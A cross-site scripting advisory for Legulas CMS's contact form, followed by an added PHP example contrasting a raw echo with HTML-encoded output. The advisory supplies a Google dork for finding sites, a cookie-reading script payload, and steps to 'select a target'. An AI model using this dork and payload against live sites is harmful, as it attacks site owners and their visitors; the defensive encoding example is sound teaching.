######################
# Exploit Title : Legulas CMS Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.legulas.com.br/
# Google Dork : intext:"Desenvolvido por Légulas 2013"
# Date: 29 Apr 2016
# Tested On : Kali
# Contact : n3t.hacker@gmail.com
######################
# Vulnerable File : contato.php
# Request Method: POST
# Payload : assunto=1&email=n3t.hacker@gmail.com&mensagem=20&nome=ndnvhdaj'%22()%26%25<acx><ScRiPt%20>alert(document.cookie)</ScRiPt>&telefone=555-666-0606
# Description : Search the dork and select a target. Append /contato.php to the URL, for example:
# http://site.com/contato.php
# Send the data above using the POST method.
#
# Demo :
#
#
######################
# discovered by : Net Hacker
######################
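#
# Added example, not part of the original advisory and not Legulas code: a hypothetical
# PHP handler showing the raw echo that produces this kind of XSS beside the encoded output
# that neutralises it. Only the field names are taken from the POST body above; the function
# names and the HTML snippet are assumptions.

```php
<?php
// Added example: hypothetical form handler. The real contato.php source is
// not on the page; only the field names are taken from the advisory.

// Encode a value for an HTML text or quoted-attribute context.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Pull the expected fields as strings, dropping arrays such as nome[]=x.
function contact_fields(array $post): array
{
    $out = [];
    foreach (['assunto', 'email', 'mensagem', 'nome', 'telefone'] as $key) {
        $out[$key] = is_string($post[$key] ?? null) ? trim($post[$key]) : '';
    }
    return $out;
}

// Constructed sample input: the advisory's POST body with a placeholder e-mail.
parse_str(
    "assunto=1&email=user%40example.com&mensagem=20&nome=ndnvhdaj'%22()%26%25"
    . "<acx><ScRiPt%20>alert(document.cookie)</ScRiPt>&telefone=555-666-0606",
    $post
);
$f = contact_fields($post);

// Vulnerable pattern (assumed): the raw value is echoed into the page.
$unsafe = '<input name="nome" value="' . $f['nome'] . '">';

// Hardened pattern: encode at the point of output.
$safe = '<input name="nome" value="' . e($f['nome']) . '">';

// Input validation is a second layer, not a replacement for encoding.
$emailOk = filter_var($f['email'], FILTER_VALIDATE_EMAIL) !== false;

// Plain-text response so the unencoded string is shown, never rendered.
header('Content-Type: text/plain; charset=UTF-8');
echo "unsafe: $unsafe\nsafe:   $safe\nemail valid: " . ($emailOk ? 'yes' : 'no') . "\n";
```

# The same encoding applies to every field that is written back into the page, not only nome.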